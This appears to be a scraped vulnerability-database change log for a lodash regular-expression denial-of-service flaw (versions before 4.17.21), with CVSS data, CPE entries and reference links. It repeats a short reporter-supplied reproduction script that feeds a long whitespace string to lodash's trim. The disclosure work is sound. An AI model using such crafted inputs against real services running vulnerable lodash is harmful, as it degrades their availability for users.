https://security.netapp.com/advisory/ntap-20210312-0006/ No Types Assigned

https://security.netapp.com/advisory/ntap-20210312-0006/ Third Party Advisory

All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0

Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

https://security.netapp.com/advisory/ntap-20210312-0006/ [No Types Assigned]

OR
     *cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*

OR
     *cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:* versions up to (excluding) 4.17.21

https://github.com/lodash/lodash/pull/5065 Third Party Advisory

https://github.com/lodash/lodash/pull/5065 Patch, Third Party Advisory

OR
     *cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*

NIST (AV:N/AC:L/Au:N/C:N/I:N/A:P)

NIST AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

NIST NVD-CWE-Other

https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8 No Types Assigned

https://github.com/lodash/lodash/blob/npm/trimEnd.js%23L8 Broken Link

https://github.com/lodash/lodash/pull/5065 No Types Assigned

https://github.com/lodash/lodash/pull/5065 Third Party Advisory

https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896 No Types Assigned

https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896 Exploit, Third Party Advisory

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894 No Types Assigned

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894 Exploit, Third Party Advisory

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892 No Types Assigned

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892 Exploit, Third Party Advisory

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895 No Types Assigned

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895 Exploit, Third Party Advisory

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893 No Types Assigned

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893 Exploit, Third Party Advisory

https://snyk.io/vuln/SNYK-JS-LODASH-1018905 No Types Assigned

https://snyk.io/vuln/SNYK-JS-LODASH-1018905 Exploit, Third Party Advisory

All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.


Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash');

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var s = build_blank(50000)
var time0 = Date.now();
lo.trim(s)
var time_cost0 = Date.now() - time0

All versions of package lodash; all versions of package org.fujion.webjars:lodash are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = "1" for (var i = 0; i < n; i++) { ret += " " } return ret + "1"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log("time_cost0